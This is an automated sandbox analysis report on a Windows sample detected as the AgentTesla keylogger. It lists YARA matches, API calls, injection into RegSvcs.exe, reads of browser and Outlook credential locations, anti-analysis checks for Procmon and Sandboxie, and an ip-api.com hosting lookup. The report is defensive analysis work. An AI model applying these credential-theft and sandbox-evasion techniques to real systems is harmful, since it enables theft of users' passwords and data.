                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AA06A GetLastError,FormatMessageW,0_2_003AA06A
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003981CB AdjustTokenPrivileges,CloseHandle,0_2_003981CB
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003987E1
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003AB333
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003BEE0D
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003B83BB
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00344E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00344E89
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeFile created: C:\Users\user\AppData\Local\Temp\autC5B3.tmpJump to behavior
                    Source: Q5QrxfKnFA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Q5QrxfKnFA.exeReversingLabs: Detection: 79%
                    Source: Q5QrxfKnFA.exeVirustotal: Detection: 57%
                    Source: unknownProcess created: C:\Users\user\Desktop\Q5QrxfKnFA.exe "C:\Users\user\Desktop\Q5QrxfKnFA.exe"
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Q5QrxfKnFA.exe"
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Q5QrxfKnFA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Q5QrxfKnFA.exeStatic file information: File size 1073664 > 1048576
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: Q5QrxfKnFA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wntdll.pdbUGP source: Q5QrxfKnFA.exe, 00000000.00000003.2123339721.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2120531844.00000000034F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Q5QrxfKnFA.exe, 00000000.00000003.2123339721.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2120531844.00000000034F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Q5QrxfKnFA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Q5QrxfKnFA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Q5QrxfKnFA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Q5QrxfKnFA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Q5QrxfKnFA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00344B37 LoadLibraryA,GetProcAddress,0_2_00344B37
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0034C4C6 push A30034BAh; retn 0034h0_2_0034C50D
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00368945 push ecx; ret 0_2_00368958
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003448D7
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003C5376
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00363187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00363187
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeAPI/Special instruction interceptor: Address: C7200C
                    Source: Q5QrxfKnFA.exe, 00000000.00000003.2109770973.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2111209976.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2109639840.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2110895311.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000002.2133604410.0000000000D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEC
                    Source: RegSvcs.exe, 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: Q5QrxfKnFA.exe, 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SBIEDLL.DLLESELECT * FROM WIN32_COMPUTERSYSTEM
                    Source: Q5QrxfKnFA.exe, 00000000.00000003.2109770973.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2111209976.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2109639840.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2110895311.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000002.2133604410.0000000000D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599116Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598857Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598697Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1898Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7956Jump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102267
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeAPI coverage: 4.5 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003A445A
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AC6D1 FindFirstFileW,FindClose,0_2_003AC6D1
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003AC75C
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AEF95
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AF0F2
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003AF3F3
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A37EF
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A3B12
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003ABCBC
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003449A0
